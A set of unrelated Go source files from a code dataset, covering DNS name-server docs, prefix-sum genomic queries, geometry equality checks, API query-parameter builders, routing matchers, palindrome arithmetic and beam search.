<p>A name server can be stopped and discarded by either using the <code>Scrub</code> method of the
name server element itself, or by using the <code>Scrub</code> method of the anchor that the
name server element is attached to.
<p>Name server elements have a simple interface:
<pre>
type Nameserver interface {
Set(rr string) error
Unset(name string)
Peek() NameserverStat
Scrub()
}
</pre>
<h3>Manipulating records</h3>
<p>Name servers maintain a set of unique <em>names</em>, together with a set of <em>records</em>
associated with each name.
<p>New records are added using the <code>Set</code> method. The argument of <code>Set</code> is
a DNS resource record in standard DNS notation. The syntax of these records are described in more detail
in the documentation of <a href="http://github.com/miekg/dns">github.com/miekg/dns</a>
as well as this <a href="http://miek.nl/posts/2014/Aug/16/go-dns-package/">related blog article</a>.
<p>Every DNS resource record, for instance <code>"miek.nl. 3600 IN MX 10 mx.miek.nl."</code>,
starts with the name that the record pertains to. Each invocation of the <code>Set</code> command
<em>adds</em> a record to the list of records pertaining to the respective name.
For instance, the following command adds the record <code>"miek.nl. 3600 IN MX 10 mx.miek.nl."</code>
to the name <code>"miek.nl."</code>
<pre>
if err := ns.Set("miek.nl. 3600 IN MX 10 mx.miek.nl."); err != nil {
… // DNS record cannot be recognized
}
</pre>
<p>The <code>Unset</code> method removes <em>all</em> records associated with a given name. For instance,
<pre>
ns.Unset("miek.nl.")
</pre>
<h3>Server status</h3>
<p>At any point, the user can asynchronously retrieve the current status of a name server element,
using the <code>Peek</code> method of the element. The returned structure (shown below)
contains a textual representation of the DNS server's address, and a map of all names and their
associated lists of resource records.
<pre>
type NameserverStat struct {
Address string
Records map[string][]string
}
</pre>
` | gocircuit.org/api/name.go | 0.653348 | 0.571557 | name.go | starcoder |
package prefix_sums
/*
A DNA sequence can be represented as a string consisting of the letters A, C, G and T, which correspond to the types
of successive nucleotides in the sequence. Each nucleotide has an impact factor, which is an integer. Nucleotides of
types A, C, G and T have impact factors of 1, 2, 3 and 4, respectively. You are going to answer several queries of the
form: What is the minimal impact factor of nucleotides contained in a particular part of the given DNA sequence?
The DNA sequence is given as a non-empty string S = S[0]S[1]...S[N-1] consisting of N characters. There are M queries,
which are given in non-empty arrays P and Q, each consisting of M integers. The K-th query (0 ≤ K < M) requires you to
find the minimal impact factor of nucleotides contained in the DNA sequence between positions P[K] and Q[K] (inclusive).
For example, consider string S = CAGCCTA and arrays P, Q such that:
P[0] = 2 Q[0] = 4
P[1] = 5 Q[1] = 5
P[2] = 0 Q[2] = 6
The answers to these M = 3 queries are as follows:
The part of the DNA between positions 2 and 4 contains nucleotides G and C (twice), whose impact factors are 3 and 2
respectively, so the answer is 2.
The part between positions 5 and 5 contains a single nucleotide T, whose impact factor is 4, so the answer is 4.
The part between positions 0 and 6 (the whole string) contains all nucleotides, in particular nucleotide A whose impact
factor is 1, so the answer is 1.
Write a function:
func Solution(S string, P []int, Q []int) []int
that, given a non-empty zero-indexed string S consisting of N characters and two non-empty zero-indexed arrays P and Q
consisting of M integers, returns an array consisting of M integers specifying the consecutive answers to all queries.
The sequence should be returned as:
a Results structure (in C), or
a vector of integers (in C++), or
a Results record (in Pascal), or
an array of integers (in any other programming language).
For example, given the string S = CAGCCTA and arrays P, Q such that:
P[0] = 2 Q[0] = 4
P[1] = 5 Q[1] = 5
P[2] = 0 Q[2] = 6
the function should return the values [2, 4, 1], as explained above.
Assume that:
N is an integer within the range [1..100,000];
M is an integer within the range [1..50,000];
each element of arrays P, Q is an integer within the range [0..N − 1];
P[K] ≤ Q[K], where 0 ≤ K < M;
string S consists only of upper-case English letters A, C, G, T.
Complexity:
expected worst-case time complexity is O(N+M);
expected worst-case space complexity is O(N), beyond input storage (not counting the storage required for input arguments).
*/
// GenomicRangeQuery answers, for each query k, the minimal impact factor
// (A=1, C=2, G=3, T=4) among the nucleotides S[P[k]..Q[k]] inclusive.
// It runs in O(N+M) time using prefix sums of the counts of A, C and G:
// if any A appears in the range the answer is 1, else any C gives 2, else
// any G gives 3, and otherwise the range is all T, so the answer is 4.
// P and Q must have the same length, with 0 <= P[k] <= Q[k] < len(S).
func GenomicRangeQuery(S string, P []int, Q []int) []int {
	A, C, G := prefixSSums(S)
	response := make([]int, len(P))
	for idx := range P {
		lo, hi := P[idx], Q[idx]+1
		switch {
		case A[hi]-A[lo] > 0:
			response[idx] = 1
		case C[hi]-C[lo] > 0:
			response[idx] = 2
		case G[hi]-G[lo] > 0:
			response[idx] = 3
		default:
			// No A, C or G in the range: everything is T.
			response[idx] = 4
		}
	}
	return response
}

// prefixSSums builds, for each of A, C and G, a prefix-count slice of length
// len(S)+1: X[i] is the number of occurrences of that nucleotide in S[:i].
// T needs no slice since its presence is implied when the others are absent.
func prefixSSums(S string) ([]int, []int, []int) {
	n := len(S)
	A := make([]int, n+1)
	C := make([]int, n+1)
	G := make([]int, n+1)
	for i := 1; i <= n; i++ {
		A[i], C[i], G[i] = A[i-1], C[i-1], G[i-1]
		// Compare raw bytes instead of allocating a one-character string.
		switch S[i-1] {
		case 'A':
			A[i]++
		case 'C':
			C[i]++
		case 'G':
			G[i]++
		}
	}
	return A, C, G
}
package ride
// selectFunctionsByName returns, for library version v, a lookup mapping a
// built-in function name to its implementation. For versions 5 and 6, when
// enableInvocation is false the reduced expression-only catalogues are
// returned instead of the full ones; earlier versions ignore the flag.
func selectFunctionsByName(v int, enableInvocation bool) (func(string) (rideFunction, bool), error) {
	switch v {
	case 1, 2:
		return functionsV2, nil
	case 3:
		return functionsV3, nil
	case 4:
		return functionsV4, nil
	case 5:
		if enableInvocation {
			return functionsV5, nil
		}
		return expressionFunctionsV5, nil
	case 6:
		if enableInvocation {
			return functionsV6, nil
		}
		return expressionFunctionsV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}

// selectFunctions returns, for library version v, the lookup mapping a
// numeric function id to its implementation.
func selectFunctions(v int) (func(id int) rideFunction, error) {
	switch v {
	case 1, 2:
		return functionV2, nil
	case 3:
		return functionV3, nil
	case 4:
		return functionV4, nil
	case 5:
		return functionV5, nil
	case 6:
		return functionV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}
// selectFunctionChecker returns, for library version v, the checker that
// maps a function name to its numeric id and reports whether it exists.
func selectFunctionChecker(v int) (func(name string) (uint16, bool), error) {
	switch v {
	case 1, 2:
		return checkFunctionV2, nil
	case 3:
		return checkFunctionV3, nil
	case 4:
		return checkFunctionV4, nil
	case 5:
		return checkFunctionV5, nil
	case 6:
		return checkFunctionV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}

// selectEvaluationCostsProvider returns the function-cost catalogue for
// library version v and evaluator version ev. Evaluator version 1 has its
// own catalogues for library versions up to 5; anything else falls back to
// the evaluator-v2 catalogue.
func selectEvaluationCostsProvider(v, ev int) (map[string]int, error) {
	switch v {
	case 1, 2:
		switch ev {
		case 1:
			return EvaluationCatalogueV2EvaluatorV1, nil
		default:
			return EvaluationCatalogueV2EvaluatorV2, nil
		}
	case 3:
		switch ev {
		case 1:
			return EvaluationCatalogueV3EvaluatorV1, nil
		default:
			return EvaluationCatalogueV3EvaluatorV2, nil
		}
	case 4:
		switch ev {
		case 1:
			return EvaluationCatalogueV4EvaluatorV1, nil
		default:
			return EvaluationCatalogueV4EvaluatorV2, nil
		}
	case 5:
		switch ev {
		case 1:
			return EvaluationCatalogueV5EvaluatorV1, nil
		default:
			return EvaluationCatalogueV5EvaluatorV2, nil
		}
	case 6: // Only new version of evaluator works after activation of RideV6
		return EvaluationCatalogueV6EvaluatorV2, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}
// selectFunctionNameProvider returns, for library version v, the mapping
// from a numeric function id back to its name.
func selectFunctionNameProvider(v int) (func(int) string, error) {
	switch v {
	case 1, 2:
		return functionNameV2, nil
	case 3:
		return functionNameV3, nil
	case 4:
		return functionNameV4, nil
	case 5:
		return functionNameV5, nil
	case 6:
		return functionNameV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}

// selectConstants returns, for library version v, the mapping from a numeric
// constant id to its constructor.
func selectConstants(v int) (func(int) rideConstructor, error) {
	switch v {
	case 1:
		return constantV1, nil
	case 2:
		return constantV2, nil
	case 3:
		return constantV3, nil
	case 4:
		return constantV4, nil
	case 5:
		return constantV5, nil
	case 6:
		return constantV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
}

// selectConstantsChecker returns, for library version v, the checker that
// maps a constant name to its numeric id and reports whether it exists.
func selectConstantsChecker(v int) (func(name string) (uint16, bool), error) {
	switch v {
	case 1:
		return checkConstantV1, nil
	case 2:
		return checkConstantV2, nil
	case 3:
		return checkConstantV3, nil
	case 4:
		return checkConstantV4, nil
	case 5:
		return checkConstantV5, nil
	case 6:
		return checkConstantV6, nil
	default:
		return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
	}
} | pkg/ride/selectors.go | 0.560734 | 0.579906 | selectors.go | starcoder |
package tegola
// IsPointEqual will check to see if the two tegola points are equal.
// Two points are equal when both are nil, or when their X and Y values match.
// NOTE(review): a Point interface holding a typed nil pointer is not == nil,
// so such a value would have its X()/Y() methods called here — confirm
// callers never wrap typed nils.
func IsPointEqual(p1, p2 Point) bool {
	if p1 == nil || p2 == nil {
		return p1 == p2
	}
	return p1.X() == p2.X() && p1.Y() == p2.Y()
}
// IsPoint3Equal will check to see if the two 3d tegola points are equal.
// A nil guard is added to mirror the sibling IsPointEqual: two nil points
// compare equal, and a nil/non-nil pair compares unequal instead of causing
// a nil-interface method call.
func IsPoint3Equal(p1, p2 Point3) bool {
	if p1 == nil || p2 == nil {
		return p1 == p2
	}
	return p1.X() == p2.X() && p1.Y() == p2.Y() && p1.Z() == p2.Z()
}
// IsMultiPointEqual reports whether the two multipoints contain the same
// points in the same order.
func IsMultiPointEqual(mp1, mp2 MultiPoint) bool {
	a, b := mp1.Points(), mp2.Points()
	if len(a) != len(b) {
		return false
	}
	for i := range a {
		if !IsPointEqual(a[i], b[i]) {
			return false
		}
	}
	return true
}
// IsLineStringEqual reports whether the two linestrings contain the same
// subpoints in the same order.
func IsLineStringEqual(l1, l2 LineString) bool {
	a, b := l1.Subpoints(), l2.Subpoints()
	if len(a) != len(b) {
		return false
	}
	for i := range a {
		if !IsPointEqual(a[i], b[i]) {
			return false
		}
	}
	return true
}
// IsMultiLineEqual reports whether the two multilines contain equal
// linestrings in the same order.
func IsMultiLineEqual(ml1, ml2 MultiLine) bool {
	a, b := ml1.Lines(), ml2.Lines()
	if len(a) != len(b) {
		return false
	}
	for i := range a {
		if !IsLineStringEqual(a[i], b[i]) {
			return false
		}
	}
	return true
}
// IsPolygonEqual will check to see if the two provided polygons are equal,
// i.e. whether they contain equal sublines (rings) in the same order.
func IsPolygonEqual(p1, p2 Polygon) bool {
	lns1, lns2 := p1.Sublines(), p2.Sublines()
	if len(lns1) != len(lns2) {
		return false
	}
	for i, ln := range lns1 {
		if !IsLineStringEqual(ln, lns2[i]) {
			return false
		}
	}
	return true
}
// IsMultiPolygonEqual reports whether the two multi-polygons contain equal
// polygons in the same order.
func IsMultiPolygonEqual(mp1, mp2 MultiPolygon) bool {
	a, b := mp1.Polygons(), mp2.Polygons()
	if len(a) != len(b) {
		return false
	}
	for i := range a {
		if !IsPolygonEqual(a[i], b[i]) {
			return false
		}
	}
	return true
}
// IsGeometryEqual will check to see if the two given geometries are equal. This function does not
// check to see if there are any recursive structures; if there are any recursive structures it
// will hang. If the type of the geometry is unknown, it is assumed that it does not match any
// other geometries.
// Note the asymmetry: dispatch is on g1's concrete type, and g2 must assert
// to the same type for the pair to be comparable.
func IsGeometryEqual(g1, g2 Geometry) bool {
	switch geo1 := g1.(type) {
	case Point:
		geo2, ok := g2.(Point)
		if !ok {
			return false
		}
		return IsPointEqual(geo1, geo2)
	case Point3:
		geo2, ok := g2.(Point3)
		if !ok {
			return false
		}
		return IsPoint3Equal(geo1, geo2)
	case MultiPoint:
		geo2, ok := g2.(MultiPoint)
		if !ok {
			return false
		}
		return IsMultiPointEqual(geo1, geo2)
	case LineString:
		geo2, ok := g2.(LineString)
		if !ok {
			return false
		}
		return IsLineStringEqual(geo1, geo2)
	case MultiLine:
		geo2, ok := g2.(MultiLine)
		if !ok {
			return false
		}
		return IsMultiLineEqual(geo1, geo2)
	case Polygon:
		geo2, ok := g2.(Polygon)
		if !ok {
			return false
		}
		return IsPolygonEqual(geo1, geo2)
	case MultiPolygon:
		geo2, ok := g2.(MultiPolygon)
		if !ok {
			return false
		}
		return IsMultiPolygonEqual(geo1, geo2)
	case Collection:
		geo2, ok := g2.(Collection)
		if !ok {
			return false
		}
		return IsCollectionEqual(geo1, geo2)
	}
	// If we don't know the type, we will assume they don't match.
	return false
}
// IsCollectionEqual will check to see if the provided collections are equal: the same number of
// geometries, pairwise equal in order. This function does not check to see if the collections
// contain any recursive structures, and if there are any recursive structures it will hang. If
// the collections contain any unknown geometries they will be assumed not to match.
func IsCollectionEqual(c1, c2 Collection) bool {
	geos1, geos2 := c1.Geometries(), c2.Geometries()
	if len(geos1) != len(geos2) {
		return false
	}
	for i, geo := range geos1 {
		if !IsGeometryEqual(geo, geos2[i]) {
			return false
		}
	}
	return true
} | isequal.go | 0.749821 | 0.810704 | isequal.go | starcoder |
package streams
// GetPipelineQueryParams represents valid query parameters for the GetPipeline operation
// For convenience GetPipelineQueryParams can be formed in a single statement, for example:
// `v := GetPipelineQueryParams{}.SetVersion(...)`
type GetPipelineQueryParams struct {
	// Version : version
	Version string `key:"version"`
}

// SetVersion sets Version and returns the updated params (value receiver:
// the original value is left untouched, enabling chained construction).
func (q GetPipelineQueryParams) SetVersion(v string) GetPipelineQueryParams {
	q.Version = v
	return q
}

// GetPipelinesStatusQueryParams represents valid query parameters for the GetPipelinesStatus operation
// For convenience GetPipelinesStatusQueryParams can be formed in a single statement, for example:
// `v := GetPipelinesStatusQueryParams{}.SetActivated(...).SetCreateUserId(...).SetName(...).SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type GetPipelinesStatusQueryParams struct {
	// Activated : activated
	// Pointer type so that an unset value can be distinguished from false.
	Activated *bool `key:"activated"`
	// CreateUserId : createUserId
	CreateUserId string `key:"createUserId"`
	// Name : name
	Name string `key:"name"`
	// Offset : offset
	// Pointer type so that an unset value can be distinguished from 0.
	Offset *int32 `key:"offset"`
	// PageSize : pageSize
	// Pointer type so that an unset value can be distinguished from 0.
	PageSize *int32 `key:"pageSize"`
	// SortDir : sortDir
	SortDir string `key:"sortDir"`
	// SortField : sortField
	SortField string `key:"sortField"`
}

// SetActivated stores the address of a copy of v and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetActivated(v bool) GetPipelinesStatusQueryParams {
	q.Activated = &v
	return q
}

// SetCreateUserId sets CreateUserId and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetCreateUserId(v string) GetPipelinesStatusQueryParams {
	q.CreateUserId = v
	return q
}

// SetName sets Name and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetName(v string) GetPipelinesStatusQueryParams {
	q.Name = v
	return q
}

// SetOffset stores the address of a copy of v and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetOffset(v int32) GetPipelinesStatusQueryParams {
	q.Offset = &v
	return q
}

// SetPageSize stores the address of a copy of v and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetPageSize(v int32) GetPipelinesStatusQueryParams {
	q.PageSize = &v
	return q
}

// SetSortDir sets SortDir and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetSortDir(v string) GetPipelinesStatusQueryParams {
	q.SortDir = v
	return q
}

// SetSortField sets SortField and returns the updated params.
func (q GetPipelinesStatusQueryParams) SetSortField(v string) GetPipelinesStatusQueryParams {
	q.SortField = v
	return q
}
// GetRegistryQueryParams represents valid query parameters for the GetRegistry operation
// For convenience GetRegistryQueryParams can be formed in a single statement, for example:
// `v := GetRegistryQueryParams{}.SetLocal(...)`
type GetRegistryQueryParams struct {
	// Local : local
	Local *bool `key:"local"`
}

// SetLocal sets the local query parameter and returns the modified copy
// for chaining.
func (q GetRegistryQueryParams) SetLocal(v bool) GetRegistryQueryParams {
	q.Local = &v
	return q
}

// GetTemplateQueryParams represents valid query parameters for the GetTemplate operation
// For convenience GetTemplateQueryParams can be formed in a single statement, for example:
// `v := GetTemplateQueryParams{}.SetVersion(...)`
type GetTemplateQueryParams struct {
	// Version : version of the template
	Version *int64 `key:"version"`
}

// SetVersion sets the version query parameter and returns the modified
// copy for chaining.
func (q GetTemplateQueryParams) SetVersion(v int64) GetTemplateQueryParams {
	q.Version = &v
	return q
}

// ListConnectionsQueryParams represents valid query parameters for the ListConnections operation
// For convenience ListConnectionsQueryParams can be formed in a single statement, for example:
// `v := ListConnectionsQueryParams{}.SetConnectorId(...).SetCreateUserId(...).SetFunctionId(...).SetName(...).SetOffset(...).SetPageSize(...).SetShowSecretNames(...).SetSortDir(...).SetSortField(...)`
type ListConnectionsQueryParams struct {
	// ConnectorId : connectorId
	ConnectorId string `key:"connectorId"`
	// CreateUserId : createUserId
	CreateUserId string `key:"createUserId"`
	// FunctionId : functionId
	FunctionId string `key:"functionId"`
	// Name : name
	Name string `key:"name"`
	// Offset : offset
	Offset *int32 `key:"offset"`
	// PageSize : pageSize
	PageSize *int32 `key:"pageSize"`
	// ShowSecretNames : showSecretNames
	ShowSecretNames string `key:"showSecretNames"`
	// SortDir : Specify either ascending ('asc') or descending ('desc') sort order for a given field (sortField), which must be set for sortDir to apply. Defaults to 'asc'.
	SortDir string `key:"sortDir"`
	// SortField : sortField
	SortField string `key:"sortField"`
}

// SetConnectorId sets the connectorId query parameter and returns the
// modified copy for chaining.
func (q ListConnectionsQueryParams) SetConnectorId(v string) ListConnectionsQueryParams {
	q.ConnectorId = v
	return q
}

// SetCreateUserId sets the createUserId query parameter and returns the
// modified copy for chaining.
func (q ListConnectionsQueryParams) SetCreateUserId(v string) ListConnectionsQueryParams {
	q.CreateUserId = v
	return q
}

// SetFunctionId sets the functionId query parameter and returns the
// modified copy for chaining.
func (q ListConnectionsQueryParams) SetFunctionId(v string) ListConnectionsQueryParams {
	q.FunctionId = v
	return q
}

// SetName sets the name query parameter and returns the modified copy
// for chaining.
func (q ListConnectionsQueryParams) SetName(v string) ListConnectionsQueryParams {
	q.Name = v
	return q
}

// SetOffset sets the offset query parameter and returns the modified
// copy for chaining.
func (q ListConnectionsQueryParams) SetOffset(v int32) ListConnectionsQueryParams {
	q.Offset = &v
	return q
}

// SetPageSize sets the pageSize query parameter and returns the modified
// copy for chaining.
func (q ListConnectionsQueryParams) SetPageSize(v int32) ListConnectionsQueryParams {
	q.PageSize = &v
	return q
}

// SetShowSecretNames sets the showSecretNames query parameter and
// returns the modified copy for chaining.
func (q ListConnectionsQueryParams) SetShowSecretNames(v string) ListConnectionsQueryParams {
	q.ShowSecretNames = v
	return q
}

// SetSortDir sets the sortDir query parameter and returns the modified
// copy for chaining.
func (q ListConnectionsQueryParams) SetSortDir(v string) ListConnectionsQueryParams {
	q.SortDir = v
	return q
}

// SetSortField sets the sortField query parameter and returns the
// modified copy for chaining.
func (q ListConnectionsQueryParams) SetSortField(v string) ListConnectionsQueryParams {
	q.SortField = v
	return q
}
// ListPipelinesQueryParams represents valid query parameters for the ListPipelines operation
// For convenience ListPipelinesQueryParams can be formed in a single statement, for example:
// `v := ListPipelinesQueryParams{}.SetActivated(...).SetCreateUserId(...).SetIncludeData(...).SetName(...).SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type ListPipelinesQueryParams struct {
	// Activated : activated
	Activated *bool `key:"activated"`
	// CreateUserId : createUserId
	CreateUserId string `key:"createUserId"`
	// IncludeData : includeData
	IncludeData *bool `key:"includeData"`
	// Name : name
	Name string `key:"name"`
	// Offset : offset
	Offset *int32 `key:"offset"`
	// PageSize : pageSize
	PageSize *int32 `key:"pageSize"`
	// SortDir : sortDir
	SortDir string `key:"sortDir"`
	// SortField : sortField
	SortField string `key:"sortField"`
}

// SetActivated sets the activated query parameter and returns the
// modified copy for chaining.
func (q ListPipelinesQueryParams) SetActivated(v bool) ListPipelinesQueryParams {
	q.Activated = &v
	return q
}

// SetCreateUserId sets the createUserId query parameter and returns the
// modified copy for chaining.
func (q ListPipelinesQueryParams) SetCreateUserId(v string) ListPipelinesQueryParams {
	q.CreateUserId = v
	return q
}

// SetIncludeData sets the includeData query parameter and returns the
// modified copy for chaining.
func (q ListPipelinesQueryParams) SetIncludeData(v bool) ListPipelinesQueryParams {
	q.IncludeData = &v
	return q
}

// SetName sets the name query parameter and returns the modified copy
// for chaining.
func (q ListPipelinesQueryParams) SetName(v string) ListPipelinesQueryParams {
	q.Name = v
	return q
}

// SetOffset sets the offset query parameter and returns the modified
// copy for chaining.
func (q ListPipelinesQueryParams) SetOffset(v int32) ListPipelinesQueryParams {
	q.Offset = &v
	return q
}

// SetPageSize sets the pageSize query parameter and returns the modified
// copy for chaining.
func (q ListPipelinesQueryParams) SetPageSize(v int32) ListPipelinesQueryParams {
	q.PageSize = &v
	return q
}

// SetSortDir sets the sortDir query parameter and returns the modified
// copy for chaining.
func (q ListPipelinesQueryParams) SetSortDir(v string) ListPipelinesQueryParams {
	q.SortDir = v
	return q
}

// SetSortField sets the sortField query parameter and returns the
// modified copy for chaining.
func (q ListPipelinesQueryParams) SetSortField(v string) ListPipelinesQueryParams {
	q.SortField = v
	return q
}

// ListTemplatesQueryParams represents valid query parameters for the ListTemplates operation
// For convenience ListTemplatesQueryParams can be formed in a single statement, for example:
// `v := ListTemplatesQueryParams{}.SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type ListTemplatesQueryParams struct {
	// Offset : offset
	Offset *int32 `key:"offset"`
	// PageSize : pageSize
	PageSize *int32 `key:"pageSize"`
	// SortDir : sortDir
	SortDir string `key:"sortDir"`
	// SortField : sortField
	SortField string `key:"sortField"`
}

// SetOffset sets the offset query parameter and returns the modified
// copy for chaining.
func (q ListTemplatesQueryParams) SetOffset(v int32) ListTemplatesQueryParams {
	q.Offset = &v
	return q
}

// SetPageSize sets the pageSize query parameter and returns the modified
// copy for chaining.
func (q ListTemplatesQueryParams) SetPageSize(v int32) ListTemplatesQueryParams {
	q.PageSize = &v
	return q
}

// SetSortDir sets the sortDir query parameter and returns the modified
// copy for chaining.
func (q ListTemplatesQueryParams) SetSortDir(v string) ListTemplatesQueryParams {
	q.SortDir = v
	return q
}

// SetSortField sets the sortField query parameter and returns the
// modified copy for chaining.
func (q ListTemplatesQueryParams) SetSortField(v string) ListTemplatesQueryParams {
	q.SortField = v
	return q
}
package routing
import (
"fmt"
"net"
"strings"
"github.com/scionproto/scion/go/lib/addr"
)
// singleIAMatcher matches ISD-AS numbers against one configured ISD-AS.
type singleIAMatcher struct {
	IA addr.IA
}

// Match reports whether ia matches the configured ISD-AS. A zero ISD or
// AS component of the configured value acts as a wildcard for that
// component; the all-zero ISD-AS matches everything.
func (m singleIAMatcher) Match(ia addr.IA) bool {
	if m.IA.IsZero() {
		return true
	}
	if m.IA.I == 0 {
		return m.IA.A == ia.A
	}
	if m.IA.A == 0 {
		return m.IA.I == ia.I
	}
	return m.IA.Equal(ia)
}

// String renders the configured ISD-AS.
func (m singleIAMatcher) String() string {
	return m.IA.String()
}
// negatedIAMatcher negates the result of the enclosed matcher.
type negatedIAMatcher struct {
	IAMatcher
}

// Match negates the result of the enclosed matcher.
func (m negatedIAMatcher) Match(ia addr.IA) bool {
	return !m.IAMatcher.Match(ia)
}

// String renders the enclosed matcher prefixed with "!".
func (m negatedIAMatcher) String() string {
	return fmt.Sprintf("!%s", m.IAMatcher)
}
// allowedNetworkMatcher is a simple IP network matcher based on allowed IP
// networks.
type allowedNetworkMatcher struct {
	Allowed []*net.IPNet
}

// Match matches the input network if it is a subset of at least one allowed
// network.
func (m allowedNetworkMatcher) Match(network *net.IPNet) bool {
	for _, n := range m.Allowed {
		if isSubnet(network, n) {
			return true
		}
	}
	return false
}

// String renders the allowed networks as a comma-separated CIDR list.
func (m allowedNetworkMatcher) String() string {
	networks := make([]string, 0, len(m.Allowed))
	for _, network := range m.Allowed {
		networks = append(networks, network.String())
	}
	return strings.Join(networks, ",")
}
// negatedNetworkMatcher negates the result of the enclosed matcher.
type negatedNetworkMatcher struct {
	NetworkMatcher
}

// Match negates the result of the enclosed matcher.
func (m negatedNetworkMatcher) Match(network *net.IPNet) bool {
	return !m.NetworkMatcher.Match(network)
}

// String renders the enclosed matcher prefixed with "!".
func (m negatedNetworkMatcher) String() string {
	return fmt.Sprintf("!%s", m.NetworkMatcher)
}
func isSubnet(sub, network *net.IPNet) bool {
nLen, _ := network.Mask.Size()
sLen, _ := sub.Mask.Size()
return network.Contains(sub.IP) && nLen <= sLen
} | go/pkg/gateway/routing/matchers.go | 0.646237 | 0.506408 | matchers.go | starcoder |
package palindrome
// multiplier returns 10^n (with ordinary wrap-around on overflow), or -1
// when n is negative.
func multiplier(n int) int {
	if n < 0 {
		return -1
	}
	result := 1
	for i := 0; i < n; i++ {
		result *= 10
	}
	return result
}
// Construct assembles a palindrome from a left half l, an optional middle
// digit m (negative means "no middle digit"), a positional multiplier x
// and the right-half digit count c. When x is zero it is recomputed as
// 10^c via multiplier.
func Construct(l, m, x, c int) int {
	if x == 0 {
		x = multiplier(c)
	}
	tail := ReverseDigits(l, c)
	if m < 0 {
		// Even total digit count: mirror the left half directly.
		return l*x + tail
	}
	// Odd total digit count: the middle digit m sits between the halves.
	return (l*10+m)*x + tail
}
// Prev returns the previous (next-smaller) palindrome relative to n,
// built from the halves produced by Split. Assumes Split yields
// (left, middle, right, multiplier, half-digit count) — TODO confirm
// against Split's definition elsewhere in this package.
func Prev(n int) int {
	// Split the number up into the left and right halves
	l, m, r, x, c := Split(n)
	// If the right half is less than or equal to the reverse of left
	// then the previous palindrome has a left side that is one less
	if ReverseDigits(r, c) <= ReverseDigits(l, c) {
		if m >= 0 {
			// We have a middle digit, so decrement it
			m--
			if m < 0 {
				// The middle digits underflowed so decrement
				// the left side and reset the middle digit to 9
				l--
				m = 9
			}
		} else {
			// No middle digit, just decrement the left side
			l--
		}
		if l < x/10 {
			// The left side underflowed
			if m >= 0 {
				// There was a middle digit, add it to the left
				// side and drop the middle digit
				l = l*10 + m
				m = -1
			} else {
				// There was no middle digit, so add one and
				// drop a digit off the right side
				m = 9
				c--
				x /= 10
			}
		}
	}
	return Construct(l, m, x, c)
}
// Next returns the next (next-larger) palindrome relative to n, mirroring
// the logic of Prev with increments instead of decrements. Assumes the
// same Split contract as Prev — TODO confirm.
func Next(n int) int {
	// Split the number up into the left and right halves
	l, m, r, x, c := Split(n)
	// If the right half is greater than or equal to the reverse of left
	// then the next palindrome has a left side that is one greater
	if ReverseDigits(r, c) >= ReverseDigits(l, c) {
		if m >= 0 {
			// We have a middle digit, so increment it
			m++
			if m > 9 {
				// The middle digits overflowed so increment
				// the left side and reset the middle digit to 0
				l++
				m = 0
			}
		} else {
			// No middle digit, just increment the left side
			l++
		}
		if l >= x {
			// The left side overflowed
			if m >= 0 {
				// There was a middle digit, so just drop
				// it and increment the digit count
				m = -1
				c++
				x *= 10
			} else {
				// There was no middle digit, so add one and
				// drop a digit off the left side
				m = 0
				l /= 10
			}
		}
	}
	return Construct(l, m, x, c)
}
package search
import (
"github.com/christat/search"
"time"
"github.com/christat/gost/queue"
"sort"
)
// Beam implements Beam Search.
//
// At every expansion only the most promising descendants (those with the
// lowest heuristic value) survive, up to beamSize of them, so the search
// behaves like a pruning-enabled Breadth-First Search. A beamSize of zero
// is treated as one.
func Beam(origin, target search.HeuristicState, beamSize uint, useNodeQueue ...bool) (path map[search.State]search.State, found bool) {
	if beamSize == 0 {
		beamSize = 1
	}
	path = map[search.State]search.State{}
	frontier := search.SelectQueueImplementation(useNodeQueue...)
	frontier.Enqueue(origin)
	for frontier.Size() > 0 {
		current := frontier.Dequeue().(search.HeuristicState)
		if current.Equals(target) {
			return path, true
		}
		enqueueBeamedDescendants(current, int(beamSize), frontier, path)
	}
	return path, false
}
// BenchmarkBeam is the benchmark variant of Beam.
// It measures execution parameters (elapsed time, nodes expanded) and
// returns them in a search.AlgorithmBenchmark entity alongside the path.
func BenchmarkBeam(origin, target search.HeuristicState, beamSize uint, useNodeQueue ...bool) (path map[search.State]search.State, found bool, bench search.AlgorithmBenchmark) {
	if beamSize == 0 {
		beamSize = 1
	}
	filterSize := int(beamSize) // acts as an invalidator for negative values
	path = make(map[search.State]search.State)
	open := search.SelectQueueImplementation(useNodeQueue...)
	var expansions uint = 0
	// Timing covers the whole search loop, including queue operations.
	start := time.Now()
	open.Enqueue(origin)
	for open.Size() > 0 {
		vertex := open.Dequeue().(search.HeuristicState)
		// Every dequeued vertex counts as one expansion, including the goal.
		expansions++
		if vertex.Equals(target) {
			found = true
			break
		}
		enqueueBeamedDescendants(vertex, filterSize, open, path)
	}
	elapsed := time.Since(start)
	return path, found, search.AlgorithmBenchmark{ElapsedTime: elapsed, TotalExpansions: expansions}
}
func enqueueBeamedDescendants(vertex search.HeuristicState, filterSize int, open gost.Queue, path map[search.State]search.State) {
neighbors := vertex.Neighbors()
// children are sorted in ascending order according to their heuristic value
sort.Slice(neighbors, func(i, j int) bool {
return neighbors[i].(search.HeuristicState).Heuristic() < neighbors[j].(search.HeuristicState).Heuristic()
})
var beamResult []search.State
if len(neighbors) >= filterSize {
beamResult = neighbors[0:filterSize]
} else {
beamResult = neighbors
}
for _, neighbor := range beamResult {
path[neighbor] = vertex
open.Enqueue(neighbor)
}
} | informed/beam.go | 0.731442 | 0.428652 | beam.go | starcoder |
package array
import (
"fmt"
"errors"
"reflect"
"github.com/golodash/structure/internal"
)
type (
